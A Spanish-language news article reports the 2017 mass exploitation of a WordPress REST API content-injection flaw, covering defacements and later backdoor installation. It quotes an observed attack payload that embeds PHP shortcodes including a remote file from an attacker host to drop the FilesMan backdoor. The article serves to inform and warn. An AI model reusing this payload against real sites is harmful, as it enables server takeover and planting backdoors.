El reciente grave fallo de seguridad de WordPress ha sido explotado masivamente para hackear más de 1,5 millones de sitios web. De acuerdo con la firma de seguridad WordFence, el fallo de inyección de contenido en WordPress recientemente divulgada ya ha sido explotada de forma masiva.

Grave Vulnerabiliad en WordPress REST API

• https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

Con el fin de evitar la exposición de los sitios web, la comunidad de WordPress retrasó más de una semana la divulgación de la vulnerabilidad para trabajar con expertos en seguridad y compañías de hosting en la creación de un parche definitivo, que tendría que ser libreado poco después de que la vulnerabilidad se hiciera pública.

La vulnerabilidad fue descubierta por un investigador de seguridad en la empresa Sucuri, quien explicó que el fallo podría ser explotada por un atacante no autenticado para inyectar contenido malicioso así como para la escalada de privilegios.

El atacante podría explotar el fallo de inyección de contenido de día cero para modificar publicaciones, páginas, así como cualquier otro contenido.

La API REST está habilitada de forma predeterminada en todos los sitios que usan WordPress 4.7 o 4.7.1. Si su sitio web está en estas versiones de WordPress entonces es actualmente vulnerable a este error. "

Al menos 18 millones de sitios web ejecutan el popular WordPress CMS, aproximadamente el 26% de los 10.000 sitios web principales ejecutan WordPress.

Expertos de Sucuri han trabajado con el equipo de desarrollo de WordPress que fijó la vulnerabilidad de inyección de contenido cero en la última versión 4.7.2 emitida el 26 de enero.

La mala noticia es que muchos sitios web de WordPress aún no han sido actualizados dejando la instalación abierta a los ataques.

Expertos de Sucuri informaron de los primeros ataques aprovechando la vulnerabilidad anterior menos de 48 horas después de su divulgación.

"En menos de 48 horas después de que se revelara la vulnerabilidad, vimos múltiples exploits públicos compartidos y publicados en línea. Con esa información fácilmente disponible, se iniciaron los intentos de sondaje y explotación a nivel de Internet ", afirma un informe publicado por Sucuri.

Los expertos observaron varias campañas de desfiguración masivas dirigidas a WordPress en todo el mundo, en una de estas campañas, los hackers reemplazaron el contenido de más de 60.000 páginas web con declaraciones "Hacked by".





Los atacantes han encontrado una manera de escalar la falla benigna de WordPress REST API y usarla para obtener acceso completo al servidor de una víctima mediante la instalación de una puerta trasera oculta. El 26 de enero, el equipo de WordPress lanzó WordPress 4.7.2, que contenía una corrección secreta que abordaba una vulnerabilidad en la API de WordPress REST.


Debido a que el equipo de WordPress temía que los atacantes explotaran este fallo de inmediato, no incluyeron detalles sobre el error en el anuncio original y sólo revelaron su presencia después de una semana, después de que un número sustancial de usuarios actualizaron sus blogs.


La gran mayoría de estos ataques habían sido ataques sencillos, en los que las tripulaciones de hacking sólo garabateaban su nombre en un sitio, y nada más.

Los ataques de WordPress REST API se vuelven más desagradables

Hacia el final de la semana pasada, las cosas se pusieron feas, de acuerdo con la empresa de seguridad de WordPress, Sucuri, quien reportó haber visto los primeros ataques que también involucraron intentos de ejecución remota de código.

Según Sucuri, los atacantes estaban elaborando mensajes especiales de degradación que incluían una lista de códigos cortos de WordPress.

Después de una mirada más atenta a estos códigos cortos, el equipo de Sucuri se dio cuenta de que eran los códigos cortos de los complementos de WordPress que permitían a los webmasters incluir código PHP personalizado dentro del contenido de texto de sus páginas y que el motor de WordPress lo ejecutara.

En términos más simples, los atacantes encontraron una forma de enviar su propio código PHP a los sitios de WordPress a través de la falla REST API, que hasta entonces sólo se utilizaba para alterar el texto preexistente.

Contenido: "[insert_php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ insert_php]
[Php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ Php] ",
"Id": "61a"}

El fragmento de código fuente anterior, visto en ataques en vivo, diría al motor de WordPress que ejecute el siguiente comando de PHP cada vez que un usuario acceda a esa página en particular.

Include ('http [:] // acommeamour.fr/tmp/xx.php');

Esta línea de código PHP incluiría un archivo PHP remoto en el sitio de la víctima, el cual descargaría e instalaría la puerta trasera de FilesMan PHP en la carpeta WordPress / wp-content / uploads /.

Después de enviar su solicitud HTTP a la API REST de WordPress de un sitio, un atacante sólo tendría que acceder a la página desfigurada una vez y, a continuación, acceder a la puerta trasera y asumir el control del servidor subyacente de la víctima.


Fuentes:
https://www.bleepingcomputer.com/news/security/wordpress-rest-api-flaw-used-to-install-backdoors/
http://securityaffairs.co/wordpress/56166/hacking/wordpress-flaw.html